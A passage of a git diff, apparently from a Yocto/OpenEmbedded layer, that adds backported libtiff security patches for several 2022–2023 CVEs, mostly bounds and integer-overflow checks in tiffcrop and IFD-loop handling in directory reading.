+ 	    return 0;
+ 	}
+ 
+-	for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlist; n++) {
+-		if (tif->tif_dirlist[n] == diroff)
+-			return 0;
++	/* Check if offset is already in the list:
++	 * - yes: check, if offset is at the same IFD number - if not, it is an IFD loop
++	 * -  no: add to list or update offset at that IFD number
++	 */
++	for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff; n++) {
++		if (tif->tif_dirlistoff[n] == diroff) {
++			if (tif->tif_dirlistdirn[n] == dirn) {
++				return 1;
++			} else {
++				TIFFWarningExt(tif->tif_clientdata, "_TIFFCheckDirNumberAndOffset",
++					"TIFF directory %hu has IFD looping to directory %hu at offset 0x%lx (%lu)",
++					dirn-1, tif->tif_dirlistdirn[n], diroff, diroff);
++				return 0;
++			}
++		}
++	}
++	/* Check if offset of an IFD has been changed and update offset of that IFD number. */
++	if (dirn < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff) {
++		/* tif_dirlistdirn can have IFD numbers dirn in random order */
++		for (n = 0; n < tif->tif_dirnumber; n++) {
++			if (tif->tif_dirlistdirn[n] == dirn) {
++				tif->tif_dirlistoff[n] = diroff;
++				return 1;
++			}
++		}
+ 	}
+ 
++	/* Add IFD offset and dirn to IFD directory list */
+ 	tif->tif_dirnumber++;
+ 
+-	if (tif->tif_dirlist == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
+-		uint64* new_dirlist;
+-
++	if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
++		uint64 *new_dirlist;
+ 		/*
+ 		 * XXX: Reduce memory allocation granularity of the dirlist
+ 		 * array.
+ 		 */
+-		new_dirlist = (uint64*)_TIFFCheckRealloc(tif, tif->tif_dirlist,
+-		    tif->tif_dirnumber, 2 * sizeof(uint64), "for IFD list");
++		if (tif->tif_dirnumber >= 32768)
++			tif->tif_dirlistsize = 65535;
++		else
++			tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
++
++		new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
++			tif->tif_dirlistsize, sizeof(uint64), "for IFD offset list");
+ 		if (!new_dirlist)
+ 			return 0;
+-		if( tif->tif_dirnumber >= 32768 )
+-		    tif->tif_dirlistsize = 65535;
+-		else
+-		    tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
+-		tif->tif_dirlist = new_dirlist;
++		tif->tif_dirlistoff = new_dirlist;
++		new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
++			tif->tif_dirlistsize, sizeof(uint16), "for IFD dirnumber list");
++		if (!new_dirlist)
++			return 0;
++		tif->tif_dirlistdirn = (uint16 *)new_dirlist;
+ 	}
+ 
+-	tif->tif_dirlist[tif->tif_dirnumber - 1] = diroff;
++	tif->tif_dirlistoff[tif->tif_dirnumber - 1] = diroff;
++	tif->tif_dirlistdirn[tif->tif_dirnumber - 1] = dirn;
+ 
+ 	return 1;
+-}
++}	/* --- _TIFFCheckDirNumberAndOffset() ---*/
+ 
+ /*
+  * Check the count field of a directory entry against a known value.  The
+@@ -4703,6 +4747,47 @@ CheckDirCount(TIFF* tif, TIFFDirEntry* d
+ }
+ 
+ /*
++ * Retrieve the matching IFD directory number of a given IFD offset
++ * from the list of directories already seen.
++ * Returns 1 if the offset was in the list and the directory number
++ * can be returned.
++ * Otherwise returns 0 or if an error occured.
++ */
++int
++_TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16* dirn)
++{
++	uint16 n;
++
++	if (diroff == 0)			/* no more directories */
++		return 0;
++	if (tif->tif_dirnumber == 65535) {
++		TIFFErrorExt(tif->tif_clientdata, "_TIFFGetDirNumberFromOffset",
++			"Cannot handle more than 65535 TIFF directories");
++		return 0;
++	}
++
++	/* Check if offset is already in the list and return matching directory number.
++	 * Otherwise update IFD list using TIFFNumberOfDirectories() 
++	 * and search again in IFD list.
++	 */
++	for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++		if (tif->tif_dirlistoff[n] == diroff) {
++			*dirn = tif->tif_dirlistdirn[n];
++			return 1;
++		}
++	}
++	TIFFNumberOfDirectories(tif);
++	for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++		if (tif->tif_dirlistoff[n] == diroff) {
++			*dirn = tif->tif_dirlistdirn[n];
++			return 1;
++		}
++	}
++	return 0;
++} /*--- _TIFFGetDirNumberFromOffset() ---*/
++
++
++/*
+  * Read IFD structure from the specified offset. If the pointer to
+  * nextdiroff variable has been specified, read it too. Function returns a
+  * number of fields in the directory or 0 if failed.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_open.c
++++ tiff-4.1.0+git191117/libtiff/tif_open.c
+@@ -353,7 +353,8 @@ TIFFClientOpen(
+ 		if (!TIFFDefaultDirectory(tif))
+ 			goto bad;
+ 		tif->tif_diroff = 0;
+-		tif->tif_dirlist = NULL;
++		tif->tif_dirlistoff = NULL;
++		tif->tif_dirlistdirn = NULL;
+ 		tif->tif_dirlistsize = 0;
+ 		tif->tif_dirnumber = 0;
+ 		return (tif);
+--- tiff-4.1.0+git191117.orig/libtiff/tiffiop.h
++++ tiff-4.1.0+git191117/libtiff/tiffiop.h
+@@ -145,7 +145,8 @@ struct tiff {
+         #define TIFF_CHOPPEDUPARRAYS 0x4000000U /* set when allocChoppedUpStripArrays() has modified strip array */
+ 	uint64               tif_diroff;       /* file offset of current directory */
+ 	uint64               tif_nextdiroff;   /* file offset of following directory */
+-	uint64*              tif_dirlist;      /* list of offsets to already seen directories to prevent IFD looping */
++	uint64*              tif_dirlistoff;   /* list of offsets to already seen directories to prevent IFD looping */
++	uint16*              tif_dirlistdirn;  /* list of directory numbers to already seen directories to prevent IFD looping */
+ 	uint16               tif_dirlistsize;  /* number of entries in offset list */
+ 	uint16               tif_dirnumber;    /* number of already seen directories */
+ 	TIFFDirectory        tif_dir;          /* internal rep of current directory */
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
new file mode 100644
index 0000000000..5747202bd9
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
@@ -0,0 +1,26 @@
+From 424c82b5b33256e7f03faace51dc8010f3ded9ff Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Sat, 21 Jan 2023 15:58:10 +0000
+Subject: [PATCH] tiffcrop: Correct simple copy paste error. Fix #488.
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz]
+CVE: CVE-2022-48281
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ tools/tiffcrop.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a0789a3..8aed9cd 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7564,7 +7564,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+         crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
+       else
+         {
+-        prev_cropsize = seg_buffs[0].size;
++        prev_cropsize = seg_buffs[i].size;
+         if (prev_cropsize < cropsize)
+           {
+           next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
new file mode 100644
index 0000000000..253018525a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
@@ -0,0 +1,157 @@
+From 7808740e100ba30ffb791044f3b14dec3e85ed6f Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:26:43 +0100
+Subject: [PATCH] CVE-2023-0795
+
+This is also the fix for CVE-2023-0796, CVE-2023-0797, CVE-2023-0798,
+CVE-2023-0799.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/afaabc3e50d4e5d80a94143f7e3c997e7e410f68
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798 CVE-2023-0799
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 51 ++++++++++++++++++++++++++++--------------------
+ 1 file changed, 30 insertions(+), 21 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 8aed9cd..f21a7d7 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -277,7 +277,6 @@ struct  region {
+   uint32 width;     /* width in pixels */
+   uint32 length;    /* length in pixels */
+   uint32 buffsize;  /* size of buffer needed to hold the cropped region */
+-  unsigned char *buffptr; /* address of start of the region */
+ };
+ 
+ /* Cropping parameters from command line and image data 
+@@ -532,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32, 
+                                      uint32,   uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- 		       unsigned char **);
++ 		       unsigned char **, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ 		       unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -5112,7 +5111,6 @@ initCropMasks (struct crop_mask *cps)
+      cps->regionlist[i].width = 0;
+      cps->regionlist[i].length = 0;
+      cps->regionlist[i].buffsize = 0;
+-     cps->regionlist[i].buffptr = NULL;
+      cps->zonelist[i].position = 0;
+      cps->zonelist[i].total = 0;
+      }
+@@ -6358,8 +6356,13 @@ static int  correct_orientation(struct image_data *image, unsigned char **work_b
+                   image->adjustments & ROTATE_ANY);
+       return (-1);
+       }
+- 
+-    if (rotateImage(rotation, image, &image->width, &image->length, work_buff_ptr))
++
++      /* Dummy variable in order not to switch two times the
++       * image->width,->length within rotateImage(),
++       * but switch xres, yres there. */
++      uint32_t width = image->width;
++      uint32_t length = image->length;
++      if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
+       {
+       TIFFError ("correct_orientation", "Unable to rotate image");
+       return (-1);
+@@ -6427,7 +6430,6 @@ extractCompositeRegions(struct image_data *image,  struct crop_mask *crop,
+     /* These should not be needed for composite images */
+     crop->regionlist[i].width = crop_width;
+     crop->regionlist[i].length = crop_length;
+-    crop->regionlist[i].buffptr = crop_buff;
+ 
+     src_rowsize = ((img_width * bps * spp) + 7) / 8;
+     dst_rowsize = (((crop_width * bps * count) + 7) / 8);
+@@ -6664,7 +6666,6 @@ extractSeparateRegion(struct image_data *image,  struct crop_mask *crop,
+ 
+   crop->regionlist[region].width = crop_width;
+   crop->regionlist[region].length = crop_length;
+-  crop->regionlist[region].buffptr = crop_buff;
+ 
+   src = read_buff;
+   dst = crop_buff;
+@@ -7542,7 +7543,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+     if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+       {
+       if (rotateImage(crop->rotation, image, &crop->combined_width, 
+-                      &crop->combined_length, &crop_buff))
++                      &crop->combined_length, &crop_buff, FALSE))
+         {
+         TIFFError("processCropSelections", 
+                   "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7648,7 +7649,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+       if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+         {
+ 	if (rotateImage(crop->rotation, image, &crop->regionlist[i].width, 
+-			&crop->regionlist[i].length, &crop_buff))
++			&crop->regionlist[i].length, &crop_buff, FALSE))
+           {
+           TIFFError("processCropSelections", 
+                     "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7780,7 +7781,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+   if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+     {
+     if (rotateImage(crop->rotation, image, &crop->combined_width, 
+-                    &crop->combined_length, crop_buff_ptr))
++                    &crop->combined_length, crop_buff_ptr, TRUE))
+       {
+       TIFFError("createCroppedImage", 
+                 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8443,7 +8444,7 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width, 
+-            uint32 *img_length, unsigned char **ibuff_ptr)
++            uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
+   {
+   int      shift_width;
+   uint32   bytes_per_pixel, bytes_per_sample;
+@@ -8634,11 +8635,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ 
+               *img_width = length;
+               *img_length = width;
+-              image->width = length;
+-              image->length = width;
+-              res_temp = image->xres;
+-              image->xres = image->yres;
+-              image->yres = res_temp;
++            /* Only toggle image parameters if whole input image is rotated. */
++            if (rot_image_params)
++            {
++                image->width = length;
++                image->length = width;
++                res_temp = image->xres;
++                image->xres = image->yres;
++                image->yres = res_temp;
++            }
+ 	      break;
+ 
+     case 270: if ((bps % 8) == 0) /* byte aligned data */
+@@ -8711,11 +8716,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+ 
+               *img_width = length;
+               *img_length = width;
+-              image->width = length;
+-              image->length = width;
+-              res_temp = image->xres;
+-              image->xres = image->yres;
+-              image->yres = res_temp;
++            /* Only toggle image parameters if whole input image is rotated. */
++            if (rot_image_params)
++            {
++                image->width = length;
++                image->length = width;
++                res_temp = image->xres;
++                image->xres = image->yres;
++                image->yres = res_temp;
++            }
+               break;
+     default:
+               break;
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
new file mode 100644
index 0000000000..bf1a439b4d
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
@@ -0,0 +1,135 @@
+From e18be834497e0ebf68d443abb9e18187f36cd3bf Mon Sep 17 00:00:00 2001
+From: Markus Koschany <apo@debian.org>
+Date: Tue, 21 Feb 2023 14:39:52 +0100
+Subject: [PATCH] CVE-2023-0800
+
+This is also the fix for CVE-2023-0801, CVE-2023-0802, CVE-2023-0803,
+CVE-2023-0804.
+
+Bug-Debian: https://bugs.debian.org/1031632
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/33aee1275d9d1384791d2206776eb8152d397f00
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2023-0800 CVE-2023-0801 CVE-2023-0802 CVE-2023-0803 CVE-2023-0804 
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ tools/tiffcrop.c | 73 +++++++++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 69 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f21a7d7..742615a 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5250,18 +5250,40 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
+ 
+       crop->regionlist[i].buffsize = buffsize;
+       crop->bufftotal += buffsize;
++
++      /* For composite images with more than one region, the
++       * combined_length or combined_width always needs to be equal,
++       * respectively.
++       * Otherwise, even the first section/region copy
++       * action might cause buffer overrun. */
+       if (crop->img_mode == COMPOSITE_IMAGES)
+         {
+         switch (crop->edge_ref)
+           {
+           case EDGE_LEFT:
+           case EDGE_RIGHT:
++               if (i > 0 && zlength != crop->combined_length)
++               {
++                   TIFFError(
++                       "computeInputPixelOffsets",
++                       "Only equal length regions can be combined for "
++                       "-E left or right");
++                   return (-1);
++               }
+                crop->combined_length = zlength;
+                crop->combined_width += zwidth;
+                break;
+           case EDGE_BOTTOM:
+           case EDGE_TOP:  /* width from left, length from top */
+           default:
++               if (i > 0 && zwidth != crop->combined_width)
++                {
++                    TIFFError("computeInputPixelOffsets",
++                              "Only equal width regions can be "
++                              "combined for -E "
++                              "top or bottom");
++                    return (-1);
++                }
+                crop->combined_width = zwidth;
+                crop->combined_length += zlength;
+ 	       break;
+@@ -6416,6 +6438,47 @@ extractCompositeRegions(struct image_data *image,  struct crop_mask *crop,
+   crop->combined_width = 0;
+   crop->combined_length = 0;
+ 
++    /* If there is more than one region, check beforehand whether all the width
++     * and length values of the regions are the same, respectively. */
++    switch (crop->edge_ref)
++    {
++        default:
++        case EDGE_TOP:
++        case EDGE_BOTTOM:
++            for (i = 1; i < crop->selections; i++)
++            {
++                uint32_t crop_width0 =
++                    crop->regionlist[i - 1].x2 - crop->regionlist[i - 1].x1 + 1;
++                uint32_t crop_width1 =
++                    crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++                if (crop_width0 != crop_width1)
++                {
++                    TIFFError("extractCompositeRegions",
++                              "Only equal width regions can be combined for -E "
++                              "top or bottom");
++                    return (1);
++                }
++            }
++            break;
++        case EDGE_LEFT:
++        case EDGE_RIGHT:
++            for (i = 1; i < crop->selections; i++)
++            {
++                uint32_t crop_length0 =
++                    crop->regionlist[i - 1].y2 - crop->regionlist[i - 1].y1 + 1;
++                uint32_t crop_length1 =
++                    crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++                if (crop_length0 != crop_length1)
++                {
++                    TIFFError("extractCompositeRegions",
++                              "Only equal length regions can be combined for "
++                              "-E left or right");
++                    return (1);
++                }
++            }
++   }
++
++
+   for (i = 0; i < crop->selections; i++)
+     {
+     /* rows, columns, width, length are expressed in pixels */
+@@ -6439,8 +6502,9 @@ extractCompositeRegions(struct image_data *image,  struct crop_mask *crop,
+       default:
+       case EDGE_TOP:
+       case EDGE_BOTTOM:
+-	   if ((i > 0) && (crop_width != crop->regionlist[i - 1].width))
+-             {
++         if ((crop->selections > i + 1) &&
++                    (crop_width != crop->regionlist[i + 1].width))
++         {
+ 	     TIFFError ("extractCompositeRegions", 
+                           "Only equal width regions can be combined for -E top or bottom");
+ 	     return (1);
+@@ -6520,8 +6584,9 @@ extractCompositeRegions(struct image_data *image,  struct crop_mask *crop,
+ 	   break;
+       case EDGE_LEFT:  /* splice the pieces of each row together, side by side */
+       case EDGE_RIGHT:
+-	   if ((i > 0) && (crop_length != crop->regionlist[i - 1].length))
+-             {
++         if ((crop->selections > i + 1) &&
++                    (crop_length != crop->regionlist[i + 1].length))
++         {
+ 	     TIFFError ("extractCompositeRegions", 
+                           "Only equal length regions can be combined for -E left or right");
+ 	     return (1);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
new file mode 100644
index 0000000000..9915b77645
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
@@ -0,0 +1,91 @@
+From 848434a81c443f59ec90d41218eba6e48a450a11 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Thu, 16 Mar 2023 16:16:54 +0800
+Subject: [PATCH] Fix heap-buffer-overflow in function extractImageSection
+
+CVE: CVE-2023-1916
+Upstream-Status: Submitted [https://gitlab.com/libtiff/libtiff/-/commit/848434a81c443f59ec90d41218eba6e48a450a11 https://gitlab.com/libtiff/libtiff/-/merge_requests/535]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ archive/tools/tiffcrop.c | 62 +++++++++++++++++++++++++++++-----------
+ 1 file changed, 45 insertions(+), 17 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/tools/tiffcrop.c
++++ tiff-4.1.0+git191117/tools/tiffcrop.c
+@@ -5549,6 +5549,15 @@ getCropOffsets(struct image_data *image,
+              crop->combined_width += (uint32)zwidth;
+            else
+              crop->combined_width = (uint32)zwidth;
++
++           /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++           if (((crop->rotation == 90) || (crop->rotation == 270))
++               && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++           {
++               TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++               return -1;
++           }
++
+            break;
+       case EDGE_BOTTOM: /* width from left, zones from bottom to top */
+            zwidth = offsets.crop_width;
+@@ -5579,6 +5588,15 @@ getCropOffsets(struct image_data *image,
+            else
+              crop->combined_length = (uint32)zlength;
+            crop->combined_width = (uint32)zwidth;
++
++           /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++           if (((crop->rotation == 90) || (crop->rotation == 270))
++               && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++           {
++               TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++               return -1;
++           }
++
+            break;
+       case EDGE_RIGHT: /* zones from right to left, length from top */
+            zlength = offsets.crop_length;
+@@ -5606,6 +5624,15 @@ getCropOffsets(struct image_data *image,
+              crop->combined_width += (uint32)zwidth;
+            else
+              crop->combined_width = (uint32)zwidth;
++
++           /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++           if (((crop->rotation == 90) || (crop->rotation == 270))
++               && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++           {
++               TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++               return -1;
++           }
++
+            break;
+       case EDGE_TOP: /* width from left, zones from top to bottom */
+       default:
+@@ -5632,6 +5659,15 @@ getCropOffsets(struct image_data *image,
+            else
+              crop->combined_length = (uint32)zlength;
+            crop->combined_width = (uint32)zwidth;
++
++           /* When the degrees clockwise rotation is 90 or 270, check the boundary */
++           if (((crop->rotation == 90) || (crop->rotation == 270))
++               && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
++           {
++               TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
++               return -1;
++           }
++
+            break;
+       } /* end switch statement */
+ 
+@@ -6827,9 +6863,9 @@ extractImageSection(struct image_data *i
+      * regardless of the way the data are organized in the input file.
+      * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1 
+      */
+-    img_rowsize = (((img_width * spp * bps) + 7) / 8);    /* row size in full bytes of source image */
+-    full_bytes = (sect_width * spp * bps) / 8;            /* number of COMPLETE bytes per row in section */
+-    trailing_bits = (sect_width * spp * bps) % 8;         /* trailing bits within the last byte of destination buffer */
++    img_rowsize = (((img_width * spp * bps) + 7) / 8);  /* row size in full bytes of source image */
++    full_bytes = (sect_width * spp * bps) / 8;          /* number of COMPLETE bytes per row in section */
++    trailing_bits = (sect_width * spp * bps) % 8;       /* trailing bits within the last byte of destination buffer */
+ 
+ #ifdef DEVELMODE
+     TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
new file mode 100644
index 0000000000..7d6d40f25a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
@@ -0,0 +1,173 @@
+From 9c22495e5eeeae9e00a1596720c969656bb8d678 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 15:31:31 +0100
+Subject: [PATCH] tiffcrop correctly update buffersize after rotateImage()
+ fix#520 rotateImage() set up a new buffer and calculates its size
+ individually. Therefore, seg_buffs[] size needs to be updated accordingly.
+ Before this fix, the seg_buffs buffer size was calculated with a different
+ formula than within rotateImage().
+
+Closes #520.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9c22495e5eeeae9e00a1596720c969656bb8d678 && https://gitlab.com/libtiff/libtiff/-/commit/688012dca2c39033aa2dc7bcea9796787cfd1b44]
+CVE: CVE-2023-25433
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 69 +++++++++++++++++++++++++++++++++++++++---------
+ 1 file changed, 56 insertions(+), 13 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 742615a..aab0ec6 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32, 
+                                      uint32,   uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+- 		       unsigned char **, int);
++		       unsigned char **, size_t *);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ 		       unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6384,7 +6384,7 @@ static int  correct_orientation(struct image_data *image, unsigned char **work_b
+        * but switch xres, yres there. */
+       uint32_t width = image->width;
+       uint32_t length = image->length;
+-      if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
++      if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+       {
+       TIFFError ("correct_orientation", "Unable to rotate image");
+       return (-1);
+@@ -7607,8 +7607,12 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ 
+     if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+       {
++      /* rotateImage() set up a new buffer and calculates its size
++       * individually. Therefore, seg_buffs size  needs to be updated
++       * accordingly. */
++      size_t rot_buf_size = 0;
+       if (rotateImage(crop->rotation, image, &crop->combined_width, 
+-                      &crop->combined_length, &crop_buff, FALSE))
++                      &crop->combined_length, &crop_buff, &rot_buf_size))
+         {
+         TIFFError("processCropSelections", 
+                   "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7713,8 +7717,13 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ 
+       if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+         {
+-	if (rotateImage(crop->rotation, image, &crop->regionlist[i].width, 
+-			&crop->regionlist[i].length, &crop_buff, FALSE))
++	  /* Furthermore, rotateImage() set up a new buffer and calculates
++           * its size individually. Therefore, seg_buffs size  needs to be
++           * updated accordingly. */
++           size_t rot_buf_size = 0;
++           if (rotateImage(
++                crop->rotation, image, &crop->regionlist[i].width,
++                &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
+           {
+           TIFFError("processCropSelections", 
+                     "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7725,8 +7734,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+         crop->combined_width = total_width;
+         crop->combined_length = total_length;
+         seg_buffs[i].buffer = crop_buff;
+-        seg_buffs[i].size = (((crop->regionlist[i].width * image->bps + 7 ) / 8)
+-                               * image->spp) * crop->regionlist[i].length; 
++        seg_buffs[i].size = rot_buf_size;
+         }
+       }
+     }
+@@ -7735,7 +7743,6 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+ 
+ /* Copy the crop section of the data from the current image into a buffer
+  * and adjust the IFD values to reflect the new size. If no cropping is
+- * required, use the origial read buffer as the crop buffer.
+  *
+  * There is quite a bit of redundancy between this routine and the more
+  * specialized processCropSelections, but this provides
+@@ -7846,7 +7853,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+   if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+     {
+     if (rotateImage(crop->rotation, image, &crop->combined_width, 
+-                    &crop->combined_length, crop_buff_ptr, TRUE))
++                    &crop->combined_length, crop_buff_ptr, NULL))
+       {
+       TIFFError("createCroppedImage", 
+                 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,7 +8522,8 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+   uint32   bytes_per_pixel, bytes_per_sample;
+   uint32   row, rowsize, src_offset, dst_offset;
+   uint32   i, col, width, length;
+-  uint32   colsize, buffsize, col_offset, pix_offset;
++  uint32   colsize, col_offset, pix_offset;
++  tmsize_t buffsize;
+   unsigned char *ibuff;
+   unsigned char *src;
+   unsigned char *dst;
+@@ -8528,12 +8536,41 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+   spp = image->spp;
+   bps = image->bps;
+ 
++  if ((spp != 0 && bps != 0 &&
++         width > (uint32_t)((UINT32_MAX - 7) / spp / bps)) ||
++        (spp != 0 && bps != 0 &&
++         length > (uint32_t)((UINT32_MAX - 7) / spp / bps)))
++    {
++        TIFFError("rotateImage", "Integer overflow detected.");
++        return (-1);
++    }
++
+   rowsize = ((bps * spp * width) + 7) / 8;
+   colsize = ((bps * spp * length) + 7) / 8;
+   if ((colsize * width) > (rowsize * length))
+-    buffsize = (colsize + 1) * width;
++{
++        if (((tmsize_t)colsize + 1) != 0 &&
++            (tmsize_t)width > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++                               ((tmsize_t)colsize + 1)))
++        {
++            TIFFError("rotateImage",
++                      "Integer overflow when calculating buffer size.");
++            return (-1);
++        }
++        buffsize = ((tmsize_t)colsize + 1) * width;
++    }
+   else
